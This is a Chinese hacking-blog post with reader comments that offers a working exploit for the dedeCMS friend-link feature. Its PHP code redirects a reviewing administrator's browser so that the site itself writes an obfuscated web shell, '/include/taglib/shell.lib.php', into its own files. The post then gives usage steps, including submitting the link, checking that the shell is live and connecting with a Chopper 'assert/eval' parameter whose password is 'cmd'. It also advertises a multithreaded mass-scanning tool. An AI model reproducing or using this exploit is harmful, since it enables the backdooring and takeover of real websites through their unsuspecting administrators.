dedeCMS友情链接getshell漏洞利用工具(附exp)

  • 内容
  • 相关

不多说一类多说的吧直接上exp


<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php

御剑字典添加/include/taglib/shell.lib.php测试是否存活即可

最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

密码为cmd


当然也有大牛研究出来了工具

2017-07-13

使用说明

1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码,点击手工插入即可进行插入功能,下次会自动获取验证码,直接输入
验证码,进行手工插入即可。
4、多线程批量扫描,可自定义线程,可以导入大量url工作。

管理员设置回复可下载

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:dedeCMS友情链接getshell漏洞利用工具(附exp) - https://www.0dayhack.com/post-389.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

475条评论
  1. avatar

    1290525938 Lv.1 Sogou Explorer Sogou Explorer Windows 7 x64 Edition Windows 7 x64 Edition 回复

    呃呃呃呃呃呃呃

    江苏省苏州市 电信

    1. avatar

      wudao Lv.2 Firefox 62.0 Firefox 62.0 Windows Windows 回复

      下载不了了。。。

      IANA 保留地址

      1. avatar

        wudao Lv.2 Firefox 62.0 Firefox 62.0 Windows Windows 回复

        多谢大牛提供,这工具不错!

        IANA 保留地址

        1. avatar

          testo Lv.2 Firefox 52.0 Firefox 52.0 GNU/Linux x64 GNU/Linux x64 回复

          谢谢

          韩国

          1. avatar

            codez Lv.1 Chrome 69.0.3497.81 Chrome 69.0.3497.81 Windows 7 Windows 7 回复

            学习了~~谢谢

            江苏省南通市 电信

            1. avatar

              nanxiao123 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

              12348413213

              安徽省合肥市巢湖市 电信

              1. avatar

                woxishashou Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                学习了~~谢谢分享

                北京市 联通

                1. avatar

                  小明新 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 Windows 7 回复

                  68325896厉害

                  广东省广州市 电信

                  1. avatar

                    aaa Lv.1 Sogou Explorer Sogou Explorer Windows 7 x64 Edition Windows 7 x64 Edition 回复

                    下载工具

                    广西桂林市灵川县 电信

                    1. avatar

                      zhangwei Lv.1 Firefox 49.0 Firefox 49.0 Windows Windows 回复

                      感谢大佬分享工具

                      四川省成都市 移动GSM/TD-SCDMA/LTE全省共用出口